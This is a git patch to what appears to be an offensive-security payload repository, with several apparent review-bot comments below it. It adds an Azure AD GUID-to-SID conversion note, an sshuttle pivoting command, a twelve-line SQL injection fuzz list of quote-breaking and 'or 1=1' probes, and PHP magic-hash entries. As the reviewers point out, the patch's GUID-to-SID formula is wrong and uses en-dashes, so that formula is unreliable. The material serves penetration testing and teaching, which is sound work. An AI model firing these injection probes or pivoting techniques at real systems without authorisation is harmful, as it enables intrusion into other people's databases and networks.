From 04899355adfd17bbdf468d1e8c863ebb3b2e6161 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 26 Apr 2020 21:43:42 +0200 Subject: [PATCH] Magic Hashes + SQL fuzz --- .../Cloud - Azure Pentest.md | 15 ++++++++++++++- .../Network Pivoting Techniques.md | 3 +++ SQL Injection/Intruder/Generic_Fuzz.txt | 12 ++++++++++++ Type Juggling/README.md | 6 +++++- 4 files changed, 34 insertions(+), 2 deletions(-) create mode 100644 SQL Injection/Intruder/Generic_Fuzz.txt diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index 9c4d692..7a3c720 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -7,6 +7,7 @@ * [Azure Storage Account - Access](#azure-storage-account----access) * [Azure AD vs Active Directory](#azure-ad-vs-active-directory) * [Azure AD - Enumeration](#azure-ad---enumeration) +* [Azure AD - Convert GUID to SID](#azure-ad---convert-guid-to-sid) * [Azure AD - Sign in with a service principal](#azure-ad---sign-in-with-a-service-principal) * [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction) * [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync) 
@@ -285,6 +286,17 @@ With Microsoft, if you are using any cloud services (Office 365, Exchange Online 3. Pick the account from the active sessions 4. Select Azure Active Directory and enjoy! +## Azure AD - Convert GUID to SID + +The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id. + +```powershell +GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)] +SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)] +``` + +For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011` + ## Azure AD - Sign in with a service principal https://docs.microsoft.com/en-us/powershell/azure/authenticate-azureps?view=azps-3.3.0&viewFallbackFrom=azurermps-6.5.0#sign-in-with-a-service-principal @@ -443,4 +455,5 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an * [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/) * [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) * [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/) -* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) \ No newline at end of file +* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) +* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56) \ No newline at end of file 
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 2fa5a50..f2fbcd6 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -151,6 +151,9 @@ pacman -Sy sshuttle apt-get install sshuttle sshuttle -vvr user@10.10.10.10 10.1.1.0/24 sshuttle -vvr username@pivot_host 10.2.2.0/24 + +# using a private key +$ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" ``` ## chisel diff --git a/SQL Injection/Intruder/Generic_Fuzz.txt b/SQL Injection/Intruder/Generic_Fuzz.txt new file mode 100644 index 0000000..624fb4d --- /dev/null +++ b/SQL Injection/Intruder/Generic_Fuzz.txt @@ -0,0 +1,12 @@ +1 +1' +1" +[1] +1` +1\ +1/*'*/ +1/*!1111'*/ +1'||'asd'||' +1' or '1'='1 +1 or 1=1 +'or''=' \ No newline at end of file diff --git a/Type Juggling/README.md b/Type Juggling/README.md index c51c805..7e97f99 100644 --- a/Type Juggling/README.md +++ b/Type Juggling/README.md 
@@ -42,9 +42,13 @@ var_dump(md5([])); # NULL If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float. -| Hash | “Magic” Number / String | Magic Hash | Found By | +| Hash | “Magic” Number / String | Magic Hash | Found By / Description | | ---- | -------------------------- |:---------------------------------------------:| -------------:| | MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 0e215962017 | 0e291242476940776845150308577824 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=? | | SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham | | SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) | | SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) |
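Review bot: In the new "Azure AD - Convert GUID to SID" section of Cloud - Azure Pentest.md, the formula `SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)]` does not describe the mapping that the worked example itself uses: a GUID has five groups, not four, and only the first sub-authority (1789435595 = 0x6aa89ecb) is a group converted directly to decimal. The second sub-authority 1301421967 is 0x4d921f8f, i.e. the 16-bit groups `1f8f` and `4d92` in swapped order, and the last two (3702525313 = 0xdcb00d81, 2188119011 = 0x826c0be3) are the remaining eight bytes read as little-endian 32-bit integers, so the text should say that the four sub-authorities are the GUID's 16 bytes in their Windows struct layout (Data1, Data2, Data3 little-endian, Data4 as-is) read as four little-endian DWORDs. Also, the quoted prefix `"S-1–12–1-"`, the code block, the example GUID `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` and the example SID all contain en-dashes (U+2013) in place of ASCII hyphens, so they break when pasted into a tool or script; replace every one with `-`.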
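Review bot: The reference-list hunk at the end of Cloud - Azure Pentest.md removes and re-adds the ROADtools line unchanged only because the file had no trailing newline, and the new last line still carries `\ No newline at end of file`; end the file with a newline so the next reference added does not churn the previous line again.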
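Review bot: In the Network Pivoting Techniques.md hunk, the added line `$ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa"` carries a `$ ` prompt while the three sshuttle lines directly above it in the same fenced block do not; drop the prompt so the block is consistent and the line can be copied as-is. The comment `# using a private key` could also mention that `-e` is the short form of sshuttle's `--ssh-cmd`, which makes the option easier to look up in the sshuttle documentation.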
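Review bot: The new file SQL Injection/Intruder/Generic_Fuzz.txt ends without a trailing newline after `'or''='`, so when the list is concatenated with the other Intruder lists (for example with `cat *.txt`) the last payload merges with the first line of the following file; terminate the file with a newline. It would also help readers if the SQL Injection README noted which entries are dialect-specific, e.g. `1/*!1111'*/` only has meaning for MySQL's version-conditional comment syntax, whereas `1'`, `1"` and `1 or 1=1` are generic quote-balance and boolean probes.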
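Review bot: In the Type Juggling/README.md hunk, the new row `| MD5 | 129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=? |` does not fit this table: the paragraph above states that the trick requires a hash starting with `0e` (or `0..0e`) followed only by digits, and this hash starts with `06`. What the row describes, per its own "Raw:" cell, is that the raw binary MD5 output (PHP's `md5($str, true)`) contains the substring `'or'8`, which matters when that raw output is concatenated unescaped into an SQL query, not when it is loosely compared with `==`; move it to its own short note with that explanation. The "Raw:" cell also replaces the non-printable bytes with `?`, which loses the exact value; show the raw digest as hex or with `\x..` escapes instead. The three added `QNKCDZO`, `0e1137126905` and `0e215962017` rows are fine and consistent with the `0e` rule.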